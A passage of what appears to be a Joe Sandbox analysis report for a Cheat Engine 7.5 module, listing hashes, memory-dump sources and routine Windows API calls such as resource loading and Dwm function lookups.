                                                                                                                                                                                                                                      • Opcode ID: bd5060874330287456a137c07f2ac4975cc639032389560d8f40e12b820dfc50
                                                                                                                                                                                                                                      • Instruction ID: 4d59913631d3e6313d7738d35c0cb9ae4dbe75daa9e7575569dfbaebdb1815e7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bd5060874330287456a137c07f2ac4975cc639032389560d8f40e12b820dfc50
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2B210831900204DFDF10EF65C988BD9BBB5FF02315F1441AAEA249A065CBB5D981CF50
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • IsWindow.USER32(00000000), ref: 6B4C9839
                                                                                                                                                                                                                                      • FindResourceW.KERNEL32(?,00000000,AFX_DIALOG_LAYOUT), ref: 6B4C9861
                                                                                                                                                                                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 6B4C9873
                                                                                                                                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 6B4C987F
                                                                                                                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 6B4C988A
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Resource$FindLoadLockSizeofWindow
                                                                                                                                                                                                                                      • String ID: AFX_DIALOG_LAYOUT
                                                                                                                                                                                                                                      • API String ID: 2582447065-2436846380
                                                                                                                                                                                                                                      • Opcode ID: 6226e2ad48d5b0b889122ef76fef493e93420c0c9e6f136d42dac63f69775ff7
                                                                                                                                                                                                                                      • Instruction ID: 7f4be3f6c4af63e6e50b51158f4561be69f9f12434975db8a85746d255cc6db4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6226e2ad48d5b0b889122ef76fef493e93420c0c9e6f136d42dac63f69775ff7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E5118E76620204BBEF125B75CC48EAB76ADEF85A58B004479E901D3313EB7AC901C776
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 6B4E08F5
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateFileTransactedW), ref: 6B4E0905
                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 6B4E094E
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressCreateFileHandleModuleProc
                                                                                                                                                                                                                                      • String ID: 0#Lk$CreateFileTransactedW$kernel32.dll
                                                                                                                                                                                                                                      • API String ID: 2580138172-3665884053
                                                                                                                                                                                                                                      • Opcode ID: b0ce430f6e954f744d98fc8b97a1205fd7f7c00eb2528ebcf53ed6efc4a63d17
                                                                                                                                                                                                                                      • Instruction ID: e65c483a02cc7e391b7ebbbee45ece6042073c3a2cc5e78ae97dd8b73849bb89
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b0ce430f6e954f744d98fc8b97a1205fd7f7c00eb2528ebcf53ed6efc4a63d17
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9301E93240010AFFEF125E95CC45CAB7F7AFB492917005129FA2492260CB36C862EB70
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindResourceW.KERNEL32(00000000,?,PNG,?,?,?,86dk,?,6B50278D,?,00000000,?), ref: 6B50191B
                                                                                                                                                                                                                                      • LoadResource.KERNEL32(00000000,00000000,?,86dk,?,6B50278D,?,00000000,?), ref: 6B501929
                                                                                                                                                                                                                                      • LockResource.KERNEL32(00000000,?,86dk,?,6B50278D,?,00000000,?), ref: 6B501934
                                                                                                                                                                                                                                      • SizeofResource.KERNEL32(00000000,00000000,?,86dk,?,6B50278D,?,00000000,?), ref: 6B501942
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                                                                      • String ID: 86dk$PNG
                                                                                                                                                                                                                                      • API String ID: 3473537107-1083223224
                                                                                                                                                                                                                                      • Opcode ID: 3c8c33329e1cfa1344ba1f8be5d34ddfeca68a36a53149f2776393cca7df7d0c
                                                                                                                                                                                                                                      • Instruction ID: cc93eb81c1526d1a8a5e1520f22d99d042e88745ae802ea7d1c3bdcb44bedccc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3c8c33329e1cfa1344ba1f8be5d34ddfeca68a36a53149f2776393cca7df7d0c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5AF06277501622BBAB516FA58808EEB776CDF866583004465F905E3201DE78D9048BB6
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • DecodePointer.KERNEL32(00000000), ref: 6B4D89ED
                                                                                                                                                                                                                                        • Part of subcall function 6B4C80F6: GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000), ref: 6B4C811C
                                                                                                                                                                                                                                        • Part of subcall function 6B4C80F6: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 6B4C812C
                                                                                                                                                                                                                                        • Part of subcall function 6B4C80F6: EncodePointer.KERNEL32(00000000,?,00000000), ref: 6B4C8135
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,DwmDefWindowProc), ref: 6B4D89D6
                                                                                                                                                                                                                                      • EncodePointer.KERNEL32(00000000), ref: 6B4D89DF
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Pointer$AddressEncodeProc$DecodeHandleModule
                                                                                                                                                                                                                                      • String ID: 0#Lk$DwmDefWindowProc$dwmapi.dll
                                                                                                                                                                                                                                      • API String ID: 1102202064-1998123538
                                                                                                                                                                                                                                      • Opcode ID: 67f8185a91a14c44b9d19e92cafe8e2a8128519b3200b9bf8f3af7fd07538022
                                                                                                                                                                                                                                      • Instruction ID: 7c0acebc26fd52d6dd69bed4532ddaba38580f72430abb96df6396a72124bdf9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 67f8185a91a14c44b9d19e92cafe8e2a8128519b3200b9bf8f3af7fd07538022
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7EF03676505227ABDF216FA5DC14CAB7FA9DB066507005151FD11E2711DB38C82287E1
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • DecodePointer.KERNEL32(00000000), ref: 6B4D8BD4
                                                                                                                                                                                                                                        • Part of subcall function 6B4C80F6: GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000), ref: 6B4C811C
                                                                                                                                                                                                                                        • Part of subcall function 6B4C80F6: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 6B4C812C
                                                                                                                                                                                                                                        • Part of subcall function 6B4C80F6: EncodePointer.KERNEL32(00000000,?,00000000), ref: 6B4C8135
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,DwmSetWindowAttribute), ref: 6B4D8BBD
                                                                                                                                                                                                                                      • EncodePointer.KERNEL32(00000000), ref: 6B4D8BC6
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Pointer$AddressEncodeProc$DecodeHandleModule
                                                                                                                                                                                                                                      • String ID: 0#Lk$DwmSetWindowAttribute$dwmapi.dll
                                                                                                                                                                                                                                      • API String ID: 1102202064-93843945
                                                                                                                                                                                                                                      • Opcode ID: dc946be5cd96071acee4c0a65d70c1dbdf1b1ec1cf851f40949f652128f57ed6
                                                                                                                                                                                                                                      • Instruction ID: 6aa95b9ef27771b1b775dc65e3ea0dccbd2f7d6bd1fe9b8d2b53fc0d4b106f5d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dc946be5cd96071acee4c0a65d70c1dbdf1b1ec1cf851f40949f652128f57ed6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 29F0BBB6440627BFCF212FA6CC24CAB7B94DF066517005112FD15D6711DB39C8114BA4
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • DecodePointer.KERNEL32(00000000), ref: 6B4D8B0D
                                                                                                                                                                                                                                        • Part of subcall function 6B4C80F6: GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000), ref: 6B4C811C
                                                                                                                                                                                                                                        • Part of subcall function 6B4C80F6: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 6B4C812C
                                                                                                                                                                                                                                        • Part of subcall function 6B4C80F6: EncodePointer.KERNEL32(00000000,?,00000000), ref: 6B4C8135
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,DwmSetIconicLivePreviewBitmap), ref: 6B4D8AF6
                                                                                                                                                                                                                                      • EncodePointer.KERNEL32(00000000), ref: 6B4D8AFF
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Pointer$AddressEncodeProc$DecodeHandleModule
                                                                                                                                                                                                                                      • String ID: 0#Lk$DwmSetIconicLivePreviewBitmap$dwmapi.dll
                                                                                                                                                                                                                                      • API String ID: 1102202064-2569324188
                                                                                                                                                                                                                                      • Opcode ID: 476c3bb0f183bd8a9d6df8a809189579fbcdfd4966fb3e5e3d207207bd0f3ddc
                                                                                                                                                                                                                                      • Instruction ID: 03ceaa24580de7a31a7c6208e7c22c34029b47a6acffdcbddc2b9695302e1f31
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 476c3bb0f183bd8a9d6df8a809189579fbcdfd4966fb3e5e3d207207bd0f3ddc
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D8F054B6500626ABDF216FA69C18CAF7BA8DF077907016255FD15E7324DB38C8128BA0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • DecodePointer.KERNEL32(00000000), ref: 6B4D8B72
                                                                                                                                                                                                                                        • Part of subcall function 6B4C80F6: GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000), ref: 6B4C811C
                                                                                                                                                                                                                                        • Part of subcall function 6B4C80F6: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 6B4C812C
                                                                                                                                                                                                                                        • Part of subcall function 6B4C80F6: EncodePointer.KERNEL32(00000000,?,00000000), ref: 6B4C8135
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,DwmSetIconicThumbnail), ref: 6B4D8B5B
                                                                                                                                                                                                                                      • EncodePointer.KERNEL32(00000000), ref: 6B4D8B64
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Pointer$AddressEncodeProc$DecodeHandleModule
                                                                                                                                                                                                                                      • String ID: 0#Lk$DwmSetIconicThumbnail$dwmapi.dll
                                                                                                                                                                                                                                      • API String ID: 1102202064-911071052
                                                                                                                                                                                                                                      • Opcode ID: 61aeba7f813b9590bd80e24ff81ec13a3ce78529c09f81f384715a93c2242d75
                                                                                                                                                                                                                                      • Instruction ID: a0a56a5cc6845ee92fbce3eea1fa22aba2d814c000d61d9c98253e6dd80985b4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 61aeba7f813b9590bd80e24ff81ec13a3ce78529c09f81f384715a93c2242d75
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BCF054B5500726ABDF213E7ADC18DAA7B98AB076903006165FD15E6320DB38C80247A0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • DecodePointer.KERNEL32(00000000), ref: 6B4D8AAE
                                                                                                                                                                                                                                        • Part of subcall function 6B4C80F6: GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000), ref: 6B4C811C
                                                                                                                                                                                                                                        • Part of subcall function 6B4C80F6: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 6B4C812C
                                                                                                                                                                                                                                        • Part of subcall function 6B4C80F6: EncodePointer.KERNEL32(00000000,?,00000000), ref: 6B4C8135
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,DwmIsCompositionEnabled), ref: 6B4D8A97
                                                                                                                                                                                                                                      • EncodePointer.KERNEL32(00000000), ref: 6B4D8AA0
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Pointer$AddressEncodeProc$DecodeHandleModule
                                                                                                                                                                                                                                      • String ID: 0#Lk$DwmIsCompositionEnabled$dwmapi.dll
                                                                                                                                                                                                                                      • API String ID: 1102202064-3884341049
                                                                                                                                                                                                                                      • Opcode ID: 09a7e0ae6645c519519ea5dcc991717a5795bf71eb23e0ba880c5bec14102f0d
                                                                                                                                                                                                                                      • Instruction ID: 5f3cc8a682e664f2ba54078a33d1394fad3bba8c16876756bd1ec14b6e4a97ca
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 09a7e0ae6645c519519ea5dcc991717a5795bf71eb23e0ba880c5bec14102f0d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 84F0BE39500226ABDB21ABBAC818EAA7798DB066907016152FC11E7304DB38C80247E0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • DecodePointer.KERNEL32(00000000), ref: 6B4D8A52
                                                                                                                                                                                                                                        • Part of subcall function 6B4C80F6: GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000), ref: 6B4C811C
                                                                                                                                                                                                                                        • Part of subcall function 6B4C80F6: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 6B4C812C
                                                                                                                                                                                                                                        • Part of subcall function 6B4C80F6: EncodePointer.KERNEL32(00000000,?,00000000), ref: 6B4C8135
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,DwmInvalidateIconicBitmaps), ref: 6B4D8A3B
                                                                                                                                                                                                                                      • EncodePointer.KERNEL32(00000000), ref: 6B4D8A44
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Pointer$AddressEncodeProc$DecodeHandleModule
                                                                                                                                                                                                                                      • String ID: 0#Lk$DwmInvalidateIconicBitmaps$dwmapi.dll
                                                                                                                                                                                                                                      • API String ID: 1102202064-2513213730
                                                                                                                                                                                                                                      • Opcode ID: 1044d51f7c6d28888a4e41a8f1d13d54e31de418560a11c228b02ede7816c1df
                                                                                                                                                                                                                                      • Instruction ID: 8d5229446e241a5fecbf39380ce265b4c75707b70e88667d7c975f3eeb60553f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1044d51f7c6d28888a4e41a8f1d13d54e31de418560a11c228b02ede7816c1df
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C9F0A7765416269BDF217B7A8818CBA77989B066913006152FD05E7310DB3CC80247E0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetParent.USER32(?), ref: 6B4EDB31
                                                                                                                                                                                                                                      • GetKeyState.USER32(00000012), ref: 6B4EDB5F
                                                                                                                                                                                                                                      • GetKeyState.USER32(00000011), ref: 6B4EDB70
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000157,00000000,00000000), ref: 6B4EDB85
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000014F,00000001,00000000), ref: 6B4EDB9A
                                                                                                                                                                                                                                      • GetNextDlgTabItem.USER32(?,?,00000000), ref: 6B4EDBD9
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSendState$ItemNextParent
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1930099164-0
                                                                                                                                                                                                                                      • Opcode ID: a1dd8a6d6dabe4b0a9c295a2955a81ec37974396e3921f47d6f873c7312672cf
                                                                                                                                                                                                                                      • Instruction ID: 0f8a5932e6dc1adcc9ef619fb9b626446dc6da5bbea810bd0a01119a251dc8b1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a1dd8a6d6dabe4b0a9c295a2955a81ec37974396e3921f47d6f873c7312672cf
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3F21C431784205AFEF183E358D45E6A377DFB82786B00046DF556C62A0EF68DD0287B1
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(00000001,?,6B604854,6B600656,6B6008F5,?,6B600B2D,?,00000001,?,?,00000001,?,6B688D58,0000000C,6B600C26), ref: 6B60496E
                                                                                                                                                                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6B60497C
                                                                                                                                                                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6B604995
                                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,6B600B2D,?,00000001,?,?,00000001,?,6B688D58,0000000C,6B600C26,?,00000001,?), ref: 6B6049E7
